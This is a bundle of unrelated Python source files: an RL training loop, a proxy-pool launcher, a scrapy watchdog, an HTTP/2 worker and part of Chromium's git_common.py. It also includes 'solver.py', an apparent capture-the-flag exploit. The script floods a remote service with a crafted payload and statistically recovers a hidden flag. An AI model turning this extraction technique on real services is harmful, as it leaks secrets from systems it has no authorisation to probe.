alpha_optim = optim.Adam([log_alpha], lr=LR)
# Prepare zmq server.
zmq_context = zmq.Context()
socket = zmq_context.socket(zmq.REP)
port = socket.bind_to_random_port(ZMQ_ADDRESS)
# Start processes.
print('Starting processes...')
processes = [multiprocessing.Process(target=environment_process, args=(port,), daemon=True) for i in range(NUM_ENVIRONMENTS)]
for p in processes:
p.start()
step = 0
start = time.time()
recent_steps = []
recent_total_reward = []
recent_collisions = []
recent_values = []
recent_stats = [[] for _ in range(5)]
replay_buffer = ReplayBuffer(REPLAY_MAX)
while True:
# Read request and process.
request = socket.recv_pyobj()
instruction = request[0]
instruction_data = request[1:]
if instruction == 'CALL_GENERATOR':
if len(replay_buffer) < REPLAY_MIN:
if TASK in ['DriveStraight', 'DriveHard']:
params = rand_macro_action_set_drive_straight(7)
else:
params = rand_macro_action_set(8, 3)
else:
with torch.no_grad():
(macro_actions, macro_actions_entropy) = gen_model.rsample(
torch.tensor(instruction_data[0], dtype=torch.float, device=device).unsqueeze(0),
torch.tensor(instruction_data[1], dtype=torch.float, device=device).unsqueeze(0))
params = macro_actions.squeeze(0).cpu().numpy()
socket.send_pyobj(params)
elif instruction == 'ADD_TRAJECTORY_RESULT':
socket.send_pyobj(0) # Return immediately.
recent_steps.append((instruction_data[0], instruction_data[2] > 0.5))
recent_total_reward.append(instruction_data[1])
recent_collisions.append(instruction_data[2])
recent_steps = recent_steps[-RECENT_HISTORY_LENGTH:]
recent_total_reward = recent_total_reward[-RECENT_HISTORY_LENGTH:]
recent_collisions = recent_collisions[-RECENT_HISTORY_LENGTH:]
for i in range(len(recent_stats)):
if instruction_data[3][i] is not None:
recent_stats[i].append(instruction_data[3][i])
recent_stats[i] = recent_stats[i][-RECENT_HISTORY_LENGTH:]
elif instruction == 'ADD_EXPERIENCE':
socket.send_pyobj(0) # Return immediately.
recent_values.append(instruction_data[3])
recent_values = recent_values[-RECENT_HISTORY_LENGTH:]
# Add to buffer.
instruction_data_cuda = [torch.tensor(t, dtype=torch.float, device=device) for t in instruction_data]
replay_buffer.append(instruction_data_cuda)
# Check for minimum replay size.
if len(replay_buffer) < REPLAY_MIN:
print('Waiting for minimum buffer size ... {}/{}'.format(len(replay_buffer), REPLAY_MIN))
continue
# Sample training mini-batch.
sampled_evaluations = replay_buffer.sample(REPLAY_SAMPLE_SIZE)
sampled_contexts = torch.stack([t[0] for t in sampled_evaluations])
sampled_states = torch.stack([t[1] for t in sampled_evaluations])
sampled_params = torch.stack([t[2] for t in sampled_evaluations])
sampled_values = torch.stack([t[3] for t in sampled_evaluations])
# Update critic.
critic_loss = torch.distributions.Normal(*critic_model(sampled_contexts, sampled_states, sampled_params)) \
.log_prob(sampled_values).mean(dim=-1)
critic_model_optimizer.zero_grad()
gen_model_optimizer.zero_grad()
(-critic_loss).backward()
torch.nn.utils.clip_grad_norm_(critic_model.parameters(), 1.0)
critic_model_optimizer.step()
# Update params model.
(macro_actions, macro_actions_entropy) = gen_model.rsample(sampled_contexts, sampled_states)
(value, sd) = critic_model(sampled_contexts, sampled_states, macro_actions)
critic_model_optimizer.zero_grad()
gen_model_optimizer.zero_grad()
dual_terms = (log_alpha.exp().detach() * macro_actions_entropy).sum(dim=-1)
gen_objective = value + dual_terms
(-gen_objective.mean()).backward()
torch.nn.utils.clip_grad_norm_(gen_model.parameters(), 1.0)
gen_model_optimizer.step()
# Update dual variables.
alpha_optim.zero_grad()
alpha_loss = log_alpha * ((macro_actions_entropy - torch.tensor(
TARGET_ENTROPY, device=device, dtype=torch.float32)).detach())
alpha_loss.mean().backward()
with torch.no_grad():
log_alpha.grad *= (((-log_alpha.grad >= 0) | (log_alpha >= LOG_ALPHA_MIN)) &
((-log_alpha.grad < 0) | (log_alpha <= LOG_ALPHA_MAX))).float()
alpha_optim.step()
# Log statistics.
if step % PRINT_INTERVAL == 0:
print("\033[H\033[J")
print('Step {}: Recent Steps (Pass) = {}'.format(step,
np.mean([s[0] for s in recent_steps if not s[1]]) if len([s[0] for s in recent_steps if not s[1]]) > 0 else None))
print('Step {}: Recent Steps (Fail) = {}'.format(step,
np.mean([s[0] for s in recent_steps if s[1]]) if len([s[0] for s in recent_steps if s[1]]) > 0 else None))
print('Step {}: Recent Total Reward = {}'.format(step, np.mean(recent_total_reward) if len(recent_total_reward) > 0 else None))
print('Step {}: Recent Collisions = {}'.format(step, np.mean(recent_collisions) if len(recent_collisions) > 0 else None))
print('Step {}: Recent Values = {}'.format(step, np.mean(recent_values) if len(recent_collisions) > 0 else None))
print('Step {}: Critic Net Loss = {}'.format(step, critic_loss.detach().item()))
print('Step {}: Generator Mean = {}'.format(step, value.mean().detach().item()))
print('Step {}: Generator S.D. = {}'.format(step, sd.mean().detach().item()))
print('Step {}: Generator Curve Entropy = {}'.format(step, macro_actions_entropy.mean(dim=-2).detach().cpu().numpy()))
for i in range(5):
chained = list(itertools.chain.from_iterable(recent_stats[i]))
print('Step {}: Recent Stat{} = {}'.format(step, i, np.mean(chained) if len(chained) > 0 else None))
print('Step {}: Elapsed = {} m'.format(step, (time.time() - start) / 60))
print('Alpha = ', torch.exp(log_alpha))
# Save models.
if step % SAVE_INTERVAL == 0:
print('Saving models....')
torch.save(gen_model.state_dict(), save_path + 'gen_model.pt.{:08d}'.format(step))
torch.save(critic_model.state_dict(), save_path + 'critic_model.pt.{:08d}'.format(step))
if NUM_ITERATIONS is not None and step >= NUM_ITERATIONS:
for p in processes:
p.terminate()
p.join()
socket.close()
exit()
step += 1
|
main.py
|
# -*- coding: utf-8 -*-
# @Author: LogicJake
# @Date: 2019-01-16 11:25:12
# @Last Modified time: 2019-01-22 19:21:05
from config import logger
from lib.database import db_object
import argparse
from get_proxy import GetProxy
from validate import ValidateOrigin
from test import TestAvailable
import threading
def init(db_type):
db_obj = db_object.new_db(db_type)
db_obj.connect()
db_obj.create_required_tables()
num = db_obj.select('available', ['COUNT(*)'])
num = num[0][0]
logger.info('There are {} available proxies'.format(num))
logger.info('The proxy pool is initialized successfully')
db_obj.close()
def start(args):
db_type = args.database
init(db_type)
get_proxy = GetProxy(db_type)
validate_origin = ValidateOrigin(db_type)
test_available = TestAvailable(db_type)
thread_get_proxy = threading.Thread(
target=get_proxy.cycle_get, name="thread-get-ip") # 定时从网站获取ip
thread_validate_proxy = threading.Thread(
target=validate_origin.cycle_validate, name="thread-validate-ip") # 定时测试能用代理
thread_test_proxy = threading.Thread(
target=test_available.cycle_test, name="Thread-test-ip") # 定时检查,剔除不能用的代理
thread_get_proxy.start()
thread_validate_proxy.start()
thread_test_proxy.start()
def parse_args():
# Parses arguments
parser = argparse.ArgumentParser(
description="collect proxy from internet.")
parser.add_argument('--database', nargs='?', default='mysql', type=str)
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
start(args)
|
solver.py
|
#!/usr/bin/env python3
import os
import sys
import json
import math
import string
import socket
import subprocess
from threading import Thread
IP = sys.argv[1] if len(sys.argv) > 1 else '0.0.0.0'
PORT = 17171
def generate_payload():
operation = 'Ry ' + str(-math.pi / 2)
operations = []
for i in range(1, 8):
operations.extend([
'SWAP', str(i),
operation,
'SWAP', str(i),
])
return operation + ' ' + ' '.join(operations)
def get_remote_io():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((IP, PORT))
file = sock.makefile('rwb')
return file, file
def get_local_io():
args = ['dotnet', './deploy/service/ZN.Runner.dll']
process = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return process.stdin, process.stdout
def send_payload(io, payload, repeat):
for _ in range(repeat):
io.write((payload + os.linesep).encode())
io.flush()
io.write(os.linesep.encode())
io.flush()
def read_output(io, repeat):
for i in range(repeat):
print('\rReading line... [ %d / %d ]' % (i + 1, repeat), end='')
line = io.readline().strip().replace(b'>>> ', b'')
if len(line) == 0:
break
yield line
print()
def calculate_counters(io, repeat):
bitsize = 8
payload = generate_payload()
fin, fout = io
thread = Thread(target=send_payload, args=(fin, payload, repeat), daemon=True)
thread.start()
counters = []
for i, line in enumerate(read_output(fout, repeat)):
data = bytes.fromhex(line.decode())
for i, byte in enumerate(data):
bits = bin(byte)[2:].zfill(bitsize)
if len(counters) <= i:
counters.append([0] * bitsize)
for k, bit in enumerate(bits):
counters[i][k] += int(bit)
return counters
def write_local_flag(text):
filename = 'flag.txt'
with open(filename, 'w') as file:
file.write(text)
def construct_model(alphabet, repeat):
write_local_flag(alphabet)
counters = calculate_counters(get_local_io(), repeat)
return dict((symbol, counter) for symbol, counter in zip(alphabet, counters))
def save_model(model):
filename = 'model.json'
with open(filename, 'w') as file:
json.dump(model, file)
def load_model():
filename = 'model.json'
with open(filename, 'r') as file:
return json.load(file)
def counters_equal(counter1, counter2, eps):
for x, y in zip(counter1, counter2):
if abs(x - y) > eps:
return False
return True
def try_get_flag(model, counters, eps):
flag = []
for counter in counters:
symbols = []
for symbol in model:
if counters_equal(model[symbol], counter, eps):
symbols.append(symbol)
if len(symbols) != 1:
return None
flag.append(symbols[0])
return ''.join(flag)
def main():
repeat = 5000
alphabet = string.ascii_letters + string.digits + '{}_'
# model = construct_model(alphabet, repeat)
# save_model(model)
# print('Model saved')
# return
model = load_model()
print('Model loaded')
counters = calculate_counters(get_remote_io(), repeat)
print('Counters loaded')
possible_flags = set()
for eps in range(1, repeat):
possible_flag = try_get_flag(model, counters, eps)
if possible_flag is not None:
possible_flags.add(possible_flag)
print(possible_flags)
if __name__ == '__main__':
main()
|
watchdog.py
|
# -*- coding: utf-8 -*-
from kazoo.client import KazooClient
import os
import sys
import logging
import time
import signal
from multiprocessing import Process
main_dir = "/root/V3/project/"
signal_dir = '/signal/sinablog'
task_type = "sinablog"
def run_proc():
os.chdir(main_dir +"sinablog/sinablog/spiders")
#arg = ["HELLO","crawl", "spider_" + task_type,"--nolog"]
arg = ["HELLO","crawl", "spider_" + task_type]
os.execvp("scrapy",arg)
def run_wait(a,b):
try:
os.waitpid(-1, os.WNOHANG)
except Exception,e:
print "no child"
signal.signal(signal.SIGCHLD, run_wait)
watchPid = []
for i in range(1,len(sys.argv)):
watchPid.append(int(sys.argv[i]))
hosts_list = ['123.206.89.123:2181', '123.207.157.135:2181', '118.89.234.46:2181']
signal_dic = {"stop":signal.SIGKILL, "start":signal.SIGCONT, "pause":signal.SIGSTOP, "continue":signal.SIGCONT}
zk = KazooClient(hosts = hosts_list)
logging.basicConfig()
zk.start()
print "watch dog working"
stop_flag = False
@zk.ChildrenWatch(signal_dir)
def signal_watch(children):
if len(children) != 0:
global watchPid
for pid in watchPid:
os.kill(pid, signal_dic[children[0]])
if children[0] == "stop":
global stop_flag
stop_flag = True
def check(pid):
global stop_flag
if stop_flag == True:
sys.exit(0)
try:
os.kill(pid, 0)
return pid
except Exception: #判断
p = Process(target=run_proc)
p.start()
return p.pid
while True:
print "begin check"
global stop_flag
if stop_flag == True:
sys.exit(0)
for pid in watchPid:
newpid = check(pid)
if stop_flag == True:
sys.exit(0)
if newpid != pid:
print "new process"
watchPid.remove(pid)
watchPid.append(newpid)
time.sleep(5)
|
http2_connection.py
|
import Queue
import threading
import socket
import errno
import struct
from http_common import *
from hyper.common.bufsocket import BufferedSocket
from hyper.packages.hyperframe.frame import (
FRAMES, DataFrame, HeadersFrame, PushPromiseFrame, RstStreamFrame,
SettingsFrame, Frame, WindowUpdateFrame, GoAwayFrame, PingFrame,
BlockedFrame, FRAME_MAX_ALLOWED_LEN, FRAME_MAX_LEN
)
from http2_stream import Stream
from hyper.http20.window import BaseFlowControlManager
from hyper.packages.hpack import Encoder, Decoder
# this is defined in rfc7540
# default window size 64k
DEFAULT_WINDOW_SIZE = 65535
# default max frame is 16k, defined in rfc7540
DEFAULT_MAX_FRAME = FRAME_MAX_LEN
class FlowControlManager(BaseFlowControlManager):
"""
``hyper``'s default flow control manager.
This implements hyper's flow control algorithms. This algorithm attempts to
reduce the number of WINDOWUPDATE frames we send without blocking the remote
endpoint behind the flow control window.
This algorithm will become more complicated over time. In the current form,
the algorithm is very simple:
- When the flow control window gets less than 3/4 of the maximum size,
increment back to the maximum.
- Otherwise, if the flow control window gets to less than 1kB, increment
back to the maximum.
"""
def increase_window_size(self, frame_size):
future_window_size = self.window_size - frame_size
if ((future_window_size < (self.initial_window_size * 3 / 4)) or
(future_window_size < 1000)):
return self.initial_window_size - future_window_size
return 0
def blocked(self):
return self.initial_window_size - self.window_size
class RawFrame(object):
def __init__(self, dat):
self.dat = dat
def serialize(self):
return self.dat
def __repr__(self):
out_str = "{type}".format(type=type(self).__name__)
return out_str
class Http2Worker(HttpWorker):
version = "2"
def __init__(self, logger, ip_manager, config, ssl_sock, close_cb, retry_task_cb, idle_cb, log_debug_data):
super(Http2Worker, self).__init__(
logger, ip_manager, config, ssl_sock, close_cb, retry_task_cb, idle_cb, log_debug_data)
self.network_buffer_size = 65535
# Google http/2 time out is 4 mins.
self.ssl_sock.settimeout(240)
self._sock = BufferedSocket(ssl_sock, self.network_buffer_size)
self.next_stream_id = 1
self.streams = {}
self.last_ping_time = time.time()
self.continue_timeout = 0
# count ping not ACK
# increase when send ping
# decrease when recv ping ack
# if this in not 0, don't accept request.
self.ping_on_way = 0
self.accept_task = False
# request_lock
self.request_lock = threading.Lock()
# all send frame must put to this queue
# then send by send_loop
# every frame put to this queue must allowed by stream window and connection window
# any data frame blocked by connection window should put to self.blocked_send_frames
self.send_queue = Queue.Queue()
self.encoder = Encoder()
self.decoder = Decoder()
# keep blocked data frame in this buffer
# which is allowed by stream window but blocked by connection window.
# They will be sent when connection window open
self.blocked_send_frames = []
# Values for the settings used on an HTTP/2 connection.
# will send to remote using Setting Frame
self.local_settings = {
SettingsFrame.INITIAL_WINDOW_SIZE: 16 * 1024 * 1024,
SettingsFrame.SETTINGS_MAX_FRAME_SIZE: 256 * 1024
}
self.local_connection_initial_windows = 32 * 1024 * 1024
self.local_window_manager = FlowControlManager(self.local_connection_initial_windows)
# changed by server, with SettingFrame
self.remote_settings = {
SettingsFrame.INITIAL_WINDOW_SIZE: DEFAULT_WINDOW_SIZE,
SettingsFrame.SETTINGS_MAX_FRAME_SIZE: DEFAULT_MAX_FRAME,
SettingsFrame.MAX_CONCURRENT_STREAMS: 100
}
#self.remote_window_size = DEFAULT_WINDOW_SIZE
self.remote_window_size = 32 * 1024 * 1024
# send Setting frame before accept task.
self._send_preamble()
threading.Thread(target=self.send_loop).start()
threading.Thread(target=self.recv_loop).start()
# export api
def request(self, task):
if not self.keep_running:
# race condition
self.retry_task_cb(task)
return
if len(self.streams) > self.config.http2_max_concurrent:
self.accept_task = False
task.set_state("h2_req")
self.request_task(task)
def encode_header(self, headers):
return self.encoder.encode(headers)
def request_task(self, task):
with self.request_lock:
# create stream to process task
stream_id = self.next_stream_id
# http/2 client use odd stream_id
self.next_stream_id += 2
stream = Stream(self.logger, self.config, self, self.ip, stream_id, task,
self._send_cb, self._close_stream_cb, self.encode_header, self.decoder,
FlowControlManager(self.local_settings[SettingsFrame.INITIAL_WINDOW_SIZE]),
self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE],
self.remote_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE])
self.streams[stream_id] = stream
stream.start_request()
def send_loop(self):
while self.keep_running:
frame = self.send_queue.get(True)
if not frame:
# None frame means exist
break
if self.config.http2_show_debug:
self.logger.debug("%s Send:%s", self.ip, str(frame))
data = frame.serialize()
try:
self._sock.send(data, flush=False)
# don't flush for small package
# reduce send api call
if self.send_queue._qsize():
continue
# wait for payload frame
time.sleep(0.01)
# combine header and payload in one tcp package.
if not self.send_queue._qsize():
self._sock.flush()
self.last_send_time = time.time()
except socket.error as e:
if e.errno not in (errno.EPIPE, errno.ECONNRESET):
self.logger.warn("%s http2 send fail:%r", self.ip, e)
else:
self.logger.exception("send error:%r", e)
self.close("send fail:%r" % e)
except Exception as e:
self.logger.debug("http2 %s send error:%r", self.ip, e)
self.close("send fail:%r" % e)
def recv_loop(self):
while self.keep_running:
try:
self._consume_single_frame()
except Exception as e:
self.logger.exception("recv fail:%r", e)
self.close("recv fail:%r" % e)
def get_rtt_rate(self):
return self.rtt + len(self.streams) * 3000
def close(self, reason="conn close"):
self.keep_running = False
self.accept_task = False
# Notify loop to exit
# This function may be call by out side http2
# When gae_proxy found the appid or ip is wrong
self.send_queue.put(None)
for stream in self.streams.values():
if stream.task.responsed:
# response have send to client
# can't retry
stream.close(reason=reason)
else:
self.retry_task_cb(stream.task)
self.streams = {}
super(Http2Worker, self).close(reason)
def send_ping(self):
p = PingFrame(0)
p.opaque_data = struct.pack("!d", time.time())
self.send_queue.put(p)
self.last_ping_time = time.time()
self.ping_on_way += 1
def _send_preamble(self):
self.send_queue.put(RawFrame(b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'))
f = SettingsFrame(0)
f.settings[SettingsFrame.ENABLE_PUSH] = 0
f.settings[SettingsFrame.INITIAL_WINDOW_SIZE] = self.local_settings[SettingsFrame.INITIAL_WINDOW_SIZE]
f.settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE] = self.local_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE]
self._send_cb(f)
# update local connection windows size
f = WindowUpdateFrame(0)
f.window_increment = self.local_connection_initial_windows - DEFAULT_WINDOW_SIZE
self._send_cb(f)
def increase_remote_window_size(self, inc_size):
# check and send blocked frames if window allow
self.remote_window_size += inc_size
#self.logger.debug("%s increase send win:%d result:%d", self.ip, inc_size, self.remote_window_size)
while len(self.blocked_send_frames):
frame = self.blocked_send_frames[0]
if len(frame.data) > self.remote_window_size:
return
self.remote_window_size -= len(frame.data)
self.send_queue.put(frame)
self.blocked_send_frames.pop(0)
if self.keep_running and \
self.accept_task == False and \
len(self.streams) < self.config.http2_max_concurrent and \
self.remote_window_size > 10000:
self.accept_task = True
self.idle_cb()
def _send_cb(self, frame):
# can called by stream
# put to send_blocked if connection window not allow,
if frame.type == DataFrame.type:
if len(frame.data) > self.remote_window_size:
self.blocked_send_frames.append(frame)
self.accept_task = False
return
else:
self.remote_window_size -= len(frame.data)
self.send_queue.put(frame)
else:
self.send_queue.put(frame)
def _close_stream_cb(self, stream_id, reason):
# call by stream to remove from streams list
# self.logger.debug("%s close stream:%d %s", self.ssl_sock.ip, stream_id, reason)
try:
del self.streams[stream_id]
except KeyError:
pass
if self.keep_running and \
len(self.streams) < self.config.http2_max_concurrent and \
self.remote_window_size > 10000:
self.accept_task = True
self.idle_cb()
self.processed_tasks += 1
def _consume_single_frame(self):
try:
header = self._sock.recv(9)
except Exception as e:
self.logger.debug("%s _consume_single_frame:%r, inactive time:%d", self.ip, e, time.time() - self.last_recv_time)
self.close("ConnectionReset:%r" % e)
return
self.last_recv_time = time.time()
# Parse the header. We can use the returned memoryview directly here.
frame, length = Frame.parse_frame_header(header)
if length > FRAME_MAX_ALLOWED_LEN:
self.logger.error("%s Frame size exceeded on stream %d (received: %d, max: %d)",
self.ip, frame.stream_id, length, FRAME_MAX_LEN)
# self._send_rst_frame(frame.stream_id, 6) # 6 = FRAME_SIZE_ERROR
try:
data = self._recv_payload(length)
except Exception as e:
self.close("ConnectionReset:%r" % e)
return
self._consume_frame_payload(frame, data)
def _recv_payload(self, length):
if not length:
return memoryview(b'')
buffer = bytearray(length)
buffer_view = memoryview(buffer)
index = 0
data_length = -1
# _sock.recv(length) might not read out all data if the given length
# is very large. So it should be to retrieve from socket repeatedly.
while length and data_length:
data = self._sock.recv(length)
self.last_recv_time = time.time()
data_length = len(data)
end = index + data_length
buffer_view[index:end] = data[:]
length -= data_length
index = end
return buffer_view[:end]
def _consume_frame_payload(self, frame, data):
frame.parse_body(data)
if self.config.http2_show_debug:
self.logger.debug("%s Recv:%s", self.ip, str(frame))
# Maintain our flow control window. We do this by delegating to the
# chosen WindowManager.
if frame.type == DataFrame.type:
size = frame.flow_controlled_length
increment = self.local_window_manager._handle_frame(size)
if increment < 0:
self.logger.warn("increment:%d", increment)
elif increment:
#self.logger.debug("%s frame size:%d increase win:%d", self.ip, size, increment)
w = WindowUpdateFrame(0)
w.window_increment = increment
self._send_cb(w)
elif frame.type == PushPromiseFrame.type:
self.logger.error("%s receive push frame", self.ip,)
# Work out to whom this frame should go.
if frame.stream_id != 0:
try:
stream = self.streams[frame.stream_id]
stream.receive_frame(frame)
except KeyError as e:
if frame.type not in [WindowUpdateFrame.type]:
self.logger.exception("%s Unexpected stream identifier %d, frame.type:%s e:%r",
self.ip, frame.stream_id, frame, e)
else:
self.receive_frame(frame)
def receive_frame(self, frame):
if frame.type == WindowUpdateFrame.type:
# self.logger.debug("WindowUpdateFrame %d", frame.window_increment)
self.increase_remote_window_size(frame.window_increment)
elif frame.type == PingFrame.type:
if 'ACK' in frame.flags:
ping_time = struct.unpack("!d", frame.opaque_data)[0]
time_now = time.time()
rtt = (time_now - ping_time) * 1000
if rtt < 0:
self.logger.error("rtt:%f ping_time:%f now:%f", rtt, ping_time, time_now)
self.rtt = rtt
self.ping_on_way -= 1
#self.logger.debug("RTT:%d, on_way:%d", self.rtt, self.ping_on_way)
if self.keep_running and self.ping_on_way == 0:
self.accept_task = True
else:
# The spec requires us to reply with PING+ACK and identical data.
p = PingFrame(0)
p.flags.add('ACK')
p.opaque_data = frame.opaque_data
self._send_cb(p)
elif frame.type == SettingsFrame.type:
if 'ACK' not in frame.flags:
# send ACK as soon as possible
f = SettingsFrame(0)
f.flags.add('ACK')
self._send_cb(f)
# this may trigger send DataFrame blocked by remote window
self._update_settings(frame)
else:
self.accept_task = True
self.idle_cb()
elif frame.type == GoAwayFrame.type:
# If we get GoAway with error code zero, we are doing a graceful
# shutdown and all is well. Otherwise, throw an exception.
# If an error occured, try to read the error description from
# code registry otherwise use the frame's additional data.
error_string = frame._extra_info()
time_cost = time.time() - self.last_recv_time
if frame.additional_data != "session_timed_out":
self.logger.warn("goaway:%s, t:%d", error_string, time_cost)
self.close("GoAway:%s inactive time:%d" % (error_string, time_cost))
elif frame.type == BlockedFrame.type:
self.logger.warn("%s get BlockedFrame", self.ip)
elif frame.type in FRAMES:
# This frame isn't valid at this point.
#raise ValueError("Unexpected frame %s." % frame)
self.logger.error("%s Unexpected frame %s.", self.ip, frame)
else: # pragma: no cover
# Unexpected frames belong to extensions. Just drop it on the
# floor, but log so that users know that something happened.
self.logger.error("%s Received unknown frame, type %d", self.ip, frame.type)
def _update_settings(self, frame):
if SettingsFrame.HEADER_TABLE_SIZE in frame.settings:
new_size = frame.settings[SettingsFrame.HEADER_TABLE_SIZE]
self.remote_settings[SettingsFrame.HEADER_TABLE_SIZE] = new_size
#self.encoder.header_table_size = new_size
if SettingsFrame.INITIAL_WINDOW_SIZE in frame.settings:
newsize = frame.settings[SettingsFrame.INITIAL_WINDOW_SIZE]
oldsize = self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE]
delta = newsize - oldsize
for stream in self.streams.values():
stream.remote_window_size += delta
self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE] = newsize
if SettingsFrame.SETTINGS_MAX_FRAME_SIZE in frame.settings:
new_size = frame.settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE]
if not (FRAME_MAX_LEN <= new_size <= FRAME_MAX_ALLOWED_LEN):
self.logger.error("%s Frame size %d is outside of allowed range", self.ip, new_size)
# Tear the connection down with error code PROTOCOL_ERROR
self.close("bad max frame size")
#error_string = ("Advertised frame size %d is outside of range" % (new_size))
#raise ConnectionError(error_string)
return
self.remote_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE] = new_size
for stream in self.streams.values():
stream.max_frame_size += new_size
def get_trace(self):
out_list = []
out_list.append(" continue_timeout:%d" % self.continue_timeout)
out_list.append(" processed:%d" % self.processed_tasks)
out_list.append(" h2.stream_num:%d" % len(self.streams))
out_list.append(" sni:%s, host:%s" % (self.ssl_sock.sni, self.ssl_sock.host))
return ",".join(out_list)
def check_active(self, now):
if not self.keep_running or len(self.streams) == 0:
return
if now - self.last_send_time > 3:
self.send_ping()
return
if now - self.last_recv_time > 6:
self.close("active timeout")
for sid in self.streams.keys():
try:
stream = self.streams[sid]
except:
pass
stream.check_timeout(now)
|
git_common.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Monkeypatch IMapIterator so that Ctrl-C can kill everything properly.
# Derived from https://gist.github.com/aljungberg/626518
from __future__ import print_function
from __future__ import unicode_literals
import multiprocessing.pool
import sys
import threading
from multiprocessing.pool import IMapIterator
def wrapper(func):
def wrap(self, timeout=None):
default_timeout = (1 << 31 if sys.version_info.major == 2 else
threading.TIMEOUT_MAX)
return func(self, timeout=timeout or default_timeout)
return wrap
IMapIterator.next = wrapper(IMapIterator.next)
IMapIterator.__next__ = IMapIterator.next
# TODO(iannucci): Monkeypatch all other 'wait' methods too.
import binascii
import collections
import contextlib
import functools
import logging
import os
import re
import setup_color
import shutil
import signal
import tempfile
import textwrap
import subprocess2
from io import BytesIO
if sys.version_info.major == 2:
# On Python 3, BrokenPipeError is raised instead.
BrokenPipeError = IOError
ROOT = os.path.abspath(os.path.dirname(__file__))
IS_WIN = sys.platform == 'win32'
TEST_MODE = False
def win_find_git():
for elem in os.environ.get('PATH', '').split(os.pathsep):
for candidate in ('git.exe', 'git.bat'):
path = os.path.join(elem, candidate)
if os.path.isfile(path):
return path
raise ValueError('Could not find Git on PATH.')
GIT_EXE = 'git' if not IS_WIN else win_find_git()
FREEZE = 'FREEZE'
FREEZE_SECTIONS = {
'indexed': 'soft',
'unindexed': 'mixed'
}
FREEZE_MATCHER = re.compile(r'%s.(%s)' % (FREEZE, '|'.join(FREEZE_SECTIONS)))
# NOTE: This list is DEPRECATED in favor of the Infra Git wrapper:
# https://chromium.googlesource.com/infra/infra/+/master/go/src/infra/tools/git
#
# New entries should be added to the Git wrapper, NOT to this list. "git_retry"
# is, similarly, being deprecated in favor of the Git wrapper.
#
# ---
#
# Retry a git operation if git returns a error response with any of these
# messages. It's all observed 'bad' GoB responses so far.
#
# This list is inspired/derived from the one in ChromiumOS's Chromite:
# <CHROMITE>/lib/git.py::GIT_TRANSIENT_ERRORS
#
# It was last imported from '7add3ac29564d98ac35ce426bc295e743e7c0c02'.
GIT_TRANSIENT_ERRORS = (
# crbug.com/285832
r'!.*\[remote rejected\].*\(error in hook\)',
# crbug.com/289932
r'!.*\[remote rejected\].*\(failed to lock\)',
# crbug.com/307156
r'!.*\[remote rejected\].*\(error in Gerrit backend\)',
# crbug.com/285832
r'remote error: Internal Server Error',
# crbug.com/294449
r'fatal: Couldn\'t find remote ref ',
# crbug.com/220543
r'git fetch_pack: expected ACK/NAK, got',
# crbug.com/189455
r'protocol error: bad pack header',
# crbug.com/202807
r'The remote end hung up unexpectedly',
# crbug.com/298189
r'TLS packet with unexpected length was received',
# crbug.com/187444
r'RPC failed; result=\d+, HTTP code = \d+',
# crbug.com/388876
r'Connection timed out',
# crbug.com/430343
# TODO(dnj): Resync with Chromite.
r'The requested URL returned error: 5\d+',
r'Connection reset by peer',
r'Unable to look up',
r'Couldn\'t resolve host',
)
GIT_TRANSIENT_ERRORS_RE = re.compile('|'.join(GIT_TRANSIENT_ERRORS),
re.IGNORECASE)
# git's for-each-ref command first supported the upstream:track token in its
# format string in version 1.9.0, but some usages were broken until 2.3.0.
# See git commit b6160d95 for more information.
MIN_UPSTREAM_TRACK_GIT_VERSION = (2, 3)
class BadCommitRefException(Exception):
def __init__(self, refs):
msg = ('one of %s does not seem to be a valid commitref.' %
str(refs))
super(BadCommitRefException, self).__init__(msg)
def memoize_one(**kwargs):
"""Memoizes a single-argument pure function.
Values of None are not cached.
Kwargs:
threadsafe (bool) - REQUIRED. Specifies whether to use locking around
cache manipulation functions. This is a kwarg so that users of memoize_one
are forced to explicitly and verbosely pick True or False.
Adds three methods to the decorated function:
* get(key, default=None) - Gets the value for this key from the cache.
* set(key, value) - Sets the value for this key from the cache.
* clear() - Drops the entire contents of the cache. Useful for unittests.
* update(other) - Updates the contents of the cache from another dict.
"""
assert 'threadsafe' in kwargs, 'Must specify threadsafe={True,False}'
threadsafe = kwargs['threadsafe']
if threadsafe:
def withlock(lock, f):
def inner(*args, **kwargs):
with lock:
return f(*args, **kwargs)
return inner
else:
def withlock(_lock, f):
return f
def decorator(f):
# Instantiate the lock in decorator, in case users of memoize_one do:
#
# memoizer = memoize_one(threadsafe=True)
#
# @memoizer
# def fn1(val): ...
#
# @memoizer
# def fn2(val): ...
lock = threading.Lock() if threadsafe else None
cache = {}
_get = withlock(lock, cache.get)
_set = withlock(lock, cache.__setitem__)
@functools.wraps(f)
def inner(arg):
ret = _get(arg)
if ret is None:
ret = f(arg)
if ret is not None:
_set(arg, ret)
return ret
inner.get = _get
inner.set = _set
inner.clear = withlock(lock, cache.clear)
inner.update = withlock(lock, cache.update)
return inner
return decorator
def _ScopedPool_initer(orig, orig_args): # pragma: no cover
"""Initializer method for ScopedPool's subprocesses.
This helps ScopedPool handle Ctrl-C's correctly.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
if orig:
orig(*orig_args)
@contextlib.contextmanager
def ScopedPool(*args, **kwargs):
"""Context Manager which returns a multiprocessing.pool instance which
correctly deals with thrown exceptions.
*args - Arguments to multiprocessing.pool
Kwargs:
kind ('threads', 'procs') - The type of underlying coprocess to use.
**etc - Arguments to multiprocessing.pool
"""
if kwargs.pop('kind', None) == 'threads':
pool = multiprocessing.pool.ThreadPool(*args, **kwargs)
else:
orig, orig_args = kwargs.get('initializer'), kwargs.get('initargs', ())
kwargs['initializer'] = _ScopedPool_initer
kwargs['initargs'] = orig, orig_args
pool = multiprocessing.pool.Pool(*args, **kwargs)
try:
yield pool
